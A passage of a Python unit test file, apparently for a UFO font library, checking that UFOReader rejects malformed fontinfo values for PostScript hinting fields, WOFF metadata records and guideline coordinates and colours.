info["postscriptStemSnapH"] = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptStemSnapV
## not list
info = dict(fontInfoVersion3)
info["postscriptStemSnapV"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## too many values
info = dict(fontInfoVersion3)
info["postscriptStemSnapV"] = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptBlueFuzz
info = dict(fontInfoVersion3)
info["postscriptBlueFuzz"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptBlueShift
info = dict(fontInfoVersion3)
info["postscriptBlueShift"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptBlueScale
info = dict(fontInfoVersion3)
info["postscriptBlueScale"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptForceBold
info = dict(fontInfoVersion3)
info["postscriptForceBold"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptDefaultWidthX
info = dict(fontInfoVersion3)
info["postscriptDefaultWidthX"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptNominalWidthX
info = dict(fontInfoVersion3)
info["postscriptNominalWidthX"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptWeightName
info = dict(fontInfoVersion3)
info["postscriptWeightName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptDefaultCharacter
info = dict(fontInfoVersion3)
info["postscriptDefaultCharacter"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# postscriptWindowsCharacterSet
info = dict(fontInfoVersion3)
info["postscriptWindowsCharacterSet"] = -1
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# macintoshFONDFamilyID
info = dict(fontInfoVersion3)
info["macintoshFONDFamilyID"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# macintoshFONDName
info = dict(fontInfoVersion3)
info["macintoshFONDName"] = 123
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
def testWOFFRead(self):
# woffMajorVersion
info = dict(fontInfoVersion3)
info["woffMajorVersion"] = 1.0
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["woffMajorVersion"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# woffMinorVersion
info = dict(fontInfoVersion3)
info["woffMinorVersion"] = 1.0
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["woffMinorVersion"] = "abc"
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# woffMetadataUniqueID
## none
info = dict(fontInfoVersion3)
del info["woffMetadataUniqueID"]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
## not a dict
info = dict(fontInfoVersion3)
info["woffMetadataUniqueID"] = 1
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## unknown key
info = dict(fontInfoVersion3)
info["woffMetadataUniqueID"] = dict(id="foo", notTheRightKey=1)
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## no id
info = dict(fontInfoVersion3)
info["woffMetadataUniqueID"] = dict()
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## not a string for id
info = dict(fontInfoVersion3)
info["woffMetadataUniqueID"] = dict(id=1)
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## empty string
info = dict(fontInfoVersion3)
info["woffMetadataUniqueID"] = dict(id="")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
# woffMetadataVendor
## no name
info = dict(fontInfoVersion3)
info["woffMetadataVendor"] = dict(url="foo")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## name not a string
info = dict(fontInfoVersion3)
info["woffMetadataVendor"] = dict(name=1, url="foo")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## name an empty string
info = dict(fontInfoVersion3)
info["woffMetadataVendor"] = dict(name="", url="foo")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
## no URL
info = dict(fontInfoVersion3)
info["woffMetadataVendor"] = dict(name="foo")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
## url not a string
info = dict(fontInfoVersion3)
info["woffMetadataVendor"] = dict(name="foo", url=1)
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## url empty string
info = dict(fontInfoVersion3)
info["woffMetadataVendor"] = dict(name="foo", url="")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
## have dir
info = dict(fontInfoVersion3)
info["woffMetadataVendor"] = dict(name="foo", url="bar", dir="ltr")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
info = dict(fontInfoVersion3)
info["woffMetadataVendor"] = dict(name="foo", url="bar", dir="rtl")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
## dir not a string
info = dict(fontInfoVersion3)
info["woffMetadataVendor"] = dict(name="foo", url="bar", dir=1)
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## dir not ltr or rtl
info = dict(fontInfoVersion3)
info["woffMetadataVendor"] = dict(name="foo", url="bar", dir="utd")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## have class
info = dict(fontInfoVersion3)
info["woffMetadataVendor"] = {"name" : "foo", "url" : "bar", "class" : "hello"}
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
## class not a string
info = dict(fontInfoVersion3)
info["woffMetadataVendor"] = {"name" : "foo", "url" : "bar", "class" : 1}
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## class empty string
info = dict(fontInfoVersion3)
info["woffMetadataVendor"] = {"name" : "foo", "url" : "bar", "class" : ""}
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
# woffMetadataCredits
## no credits attribute
info = dict(fontInfoVersion3)
info["woffMetadataCredits"] = {}
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## unknown attribute
info = dict(fontInfoVersion3)
info["woffMetadataCredits"] = dict(credits=[dict(name="foo")], notTheRightKey=1)
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## not a list
info = dict(fontInfoVersion3)
info["woffMetadataCredits"] = dict(credits="abc")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## no elements in credits
info = dict(fontInfoVersion3)
info["woffMetadataCredits"] = dict(credits=[])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## credit not a dict
info = dict(fontInfoVersion3)
info["woffMetadataCredits"] = dict(credits=["abc"])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## unknown key
info = dict(fontInfoVersion3)
info["woffMetadataCredits"] = dict(credits=[dict(name="foo", notTheRightKey=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## no name
info = dict(fontInfoVersion3)
info["woffMetadataCredits"] = dict(credits=[dict(url="foo")])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## name not a string
info = dict(fontInfoVersion3)
info["woffMetadataCredits"] = dict(credits=[dict(name=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## url not a string
info = dict(fontInfoVersion3)
info["woffMetadataCredits"] = dict(credits=[dict(name="foo", url=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## role not a string
info = dict(fontInfoVersion3)
info["woffMetadataCredits"] = dict(credits=[dict(name="foo", role=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## dir not a string
info = dict(fontInfoVersion3)
info["woffMetadataCredits"] = dict(credits=[dict(name="foo", dir=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## dir not ltr or rtl
info = dict(fontInfoVersion3)
info["woffMetadataCredits"] = dict(credits=[dict(name="foo", dir="utd")])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## class not a string
info = dict(fontInfoVersion3)
info["woffMetadataCredits"] = dict(credits=[{"name" : "foo", "class" : 1}])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# woffMetadataDescription
## no url
info = dict(fontInfoVersion3)
info["woffMetadataDescription"] = dict(text=[dict(text="foo")])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
## url not a string
info = dict(fontInfoVersion3)
info["woffMetadataDescription"] = dict(text=[dict(text="foo")], url=1)
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## no text
info = dict(fontInfoVersion3)
info["woffMetadataDescription"] = dict(url="foo")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text not a list
info = dict(fontInfoVersion3)
info["woffMetadataDescription"] = dict(text="abc")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text item not a dict
info = dict(fontInfoVersion3)
info["woffMetadataDescription"] = dict(text=["abc"])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text item unknown key
info = dict(fontInfoVersion3)
info["woffMetadataDescription"] = dict(text=[dict(text="foo", notTheRightKey=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text item missing text
info = dict(fontInfoVersion3)
info["woffMetadataDescription"] = dict(text=[dict(language="foo")])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text not a string
info = dict(fontInfoVersion3)
info["woffMetadataDescription"] = dict(text=[dict(text=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## url not a string
info = dict(fontInfoVersion3)
info["woffMetadataDescription"] = dict(text=[dict(text="foo", url=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## language not a string
info = dict(fontInfoVersion3)
info["woffMetadataDescription"] = dict(text=[dict(text="foo", language=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## dir not ltr or rtl
info = dict(fontInfoVersion3)
info["woffMetadataDescription"] = dict(text=[dict(text="foo", dir="utd")])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## class not a string
info = dict(fontInfoVersion3)
info["woffMetadataDescription"] = dict(text=[{"text" : "foo", "class" : 1}])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# woffMetadataLicense
## no url
info = dict(fontInfoVersion3)
info["woffMetadataLicense"] = dict(text=[dict(text="foo")])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
## url not a string
info = dict(fontInfoVersion3)
info["woffMetadataLicense"] = dict(text=[dict(text="foo")], url=1)
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## id not a string
info = dict(fontInfoVersion3)
info["woffMetadataLicense"] = dict(text=[dict(text="foo")], id=1)
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## no text
info = dict(fontInfoVersion3)
info["woffMetadataLicense"] = dict(url="foo")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
## text not a list
info = dict(fontInfoVersion3)
info["woffMetadataLicense"] = dict(text="abc")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text item not a dict
info = dict(fontInfoVersion3)
info["woffMetadataLicense"] = dict(text=["abc"])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text item unknown key
info = dict(fontInfoVersion3)
info["woffMetadataLicense"] = dict(text=[dict(text="foo", notTheRightKey=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text item missing text
info = dict(fontInfoVersion3)
info["woffMetadataLicense"] = dict(text=[dict(language="foo")])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text not a string
info = dict(fontInfoVersion3)
info["woffMetadataLicense"] = dict(text=[dict(text=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## url not a string
info = dict(fontInfoVersion3)
info["woffMetadataLicense"] = dict(text=[dict(text="foo", url=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## language not a string
info = dict(fontInfoVersion3)
info["woffMetadataLicense"] = dict(text=[dict(text="foo", language=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## dir not ltr or rtl
info = dict(fontInfoVersion3)
info["woffMetadataLicense"] = dict(text=[dict(text="foo", dir="utd")])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## class not a string
info = dict(fontInfoVersion3)
info["woffMetadataLicense"] = dict(text=[{"text" : "foo", "class" : 1}])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# woffMetadataCopyright
## unknown attribute
info = dict(fontInfoVersion3)
info["woffMetadataCopyright"] = dict(text=[dict(text="foo")], notTheRightKey=1)
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## no text
info = dict(fontInfoVersion3)
info["woffMetadataCopyright"] = dict()
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text not a list
info = dict(fontInfoVersion3)
info["woffMetadataCopyright"] = dict(text="abc")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text item not a dict
info = dict(fontInfoVersion3)
info["woffMetadataCopyright"] = dict(text=["abc"])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text item unknown key
info = dict(fontInfoVersion3)
info["woffMetadataCopyright"] = dict(text=[dict(text="foo", notTheRightKey=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text item missing text
info = dict(fontInfoVersion3)
info["woffMetadataCopyright"] = dict(text=[dict(language="foo")])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text not a string
info = dict(fontInfoVersion3)
info["woffMetadataCopyright"] = dict(text=[dict(text=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## url not a string
info = dict(fontInfoVersion3)
info["woffMetadataCopyright"] = dict(text=[dict(text="foo", url=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## language not a string
info = dict(fontInfoVersion3)
info["woffMetadataCopyright"] = dict(text=[dict(text="foo", language=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## dir not ltr or rtl
info = dict(fontInfoVersion3)
info["woffMetadataCopyright"] = dict(text=[dict(text="foo", dir="utd")])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## class not a string
info = dict(fontInfoVersion3)
info["woffMetadataCopyright"] = dict(text=[{"text" : "foo", "class" : 1}])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# woffMetadataTrademark
## unknown attribute
info = dict(fontInfoVersion3)
info["woffMetadataTrademark"] = dict(text=[dict(text="foo")], notTheRightKey=1)
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## no text
info = dict(fontInfoVersion3)
info["woffMetadataTrademark"] = dict()
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text not a list
info = dict(fontInfoVersion3)
info["woffMetadataTrademark"] = dict(text="abc")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text item not a dict
info = dict(fontInfoVersion3)
info["woffMetadataTrademark"] = dict(text=["abc"])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text item unknown key
info = dict(fontInfoVersion3)
info["woffMetadataTrademark"] = dict(text=[dict(text="foo", notTheRightKey=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text item missing text
info = dict(fontInfoVersion3)
info["woffMetadataTrademark"] = dict(text=[dict(language="foo")])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## text not a string
info = dict(fontInfoVersion3)
info["woffMetadataTrademark"] = dict(text=[dict(text=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## url not a string
info = dict(fontInfoVersion3)
info["woffMetadataTrademark"] = dict(text=[dict(text="foo", url=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## language not a string
info = dict(fontInfoVersion3)
info["woffMetadataTrademark"] = dict(text=[dict(text="foo", language=1)])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## dir not ltr or rtl
info = dict(fontInfoVersion3)
info["woffMetadataTrademark"] = dict(text=[dict(text="foo", dir="utd")])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## class not a string
info = dict(fontInfoVersion3)
info["woffMetadataTrademark"] = dict(text=[{"text" : "foo", "class" : 1}])
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# woffMetadataLicensee
## no name
info = dict(fontInfoVersion3)
info["woffMetadataLicensee"] = dict()
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## unknown attribute
info = dict(fontInfoVersion3)
info["woffMetadataLicensee"] = dict(name="foo", notTheRightKey=1)
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## name not a string
info = dict(fontInfoVersion3)
info["woffMetadataLicensee"] = dict(name=1)
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## dir options
info = dict(fontInfoVersion3)
info["woffMetadataLicensee"] = dict(name="foo", dir="ltr")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
info = dict(fontInfoVersion3)
info["woffMetadataLicensee"] = dict(name="foo", dir="rtl")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
## dir not ltr or rtl
info = dict(fontInfoVersion3)
info["woffMetadataLicensee"] = dict(name="foo", dir="utd")
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## have class
info = dict(fontInfoVersion3)
info["woffMetadataLicensee"] = {"name" : "foo", "class" : "hello"}
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
reader.readInfo(TestInfoObject())
## class not a string
info = dict(fontInfoVersion3)
info["woffMetadataLicensee"] = {"name" : "foo", "class" : 1}
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
def testGuidelinesRead(self):
# x
## not an int or float
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x="1")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# y
## not an int or float
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(y="1")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# angle
## < 0
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, y=0, angle=-1)]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## > 360
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, y=0, angle=361)]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# name
## not a string
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, name=1)]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
# color
## not a string
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color=1)]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## not enough commas
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="1 0, 0, 0")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="1 0 0, 0")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="1 0 0 0")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## not enough parts
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color=", 0, 0, 0")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="1, , 0, 0")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="1, 0, , 0")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="1, 0, 0, ")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color=", , , ")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## not a number in all positions
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="r, 1, 1, 1")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="1, g, 1, 1")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="1, 1, b, 1")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="1, 1, 1, a")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## too many parts
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="1, 0, 0, 0, 0")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## < 0 in each position
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="-1, 0, 0, 0")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="0, -1, 0, 0")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="0, 0, -1, 0")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="0, 0, 0, -1")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
## > 1 in each position
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="2, 0, 0, 0")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
info["guidelines"] = [dict(x=0, color="0, 2, 0, 0")]
self._writeInfoToPlist(info)
reader = UFOReader(self.dstDir)
self.assertRaises(UFOLibError, reader.readInfo, TestInfoObject())
info = dict(fontInfoVersion3)
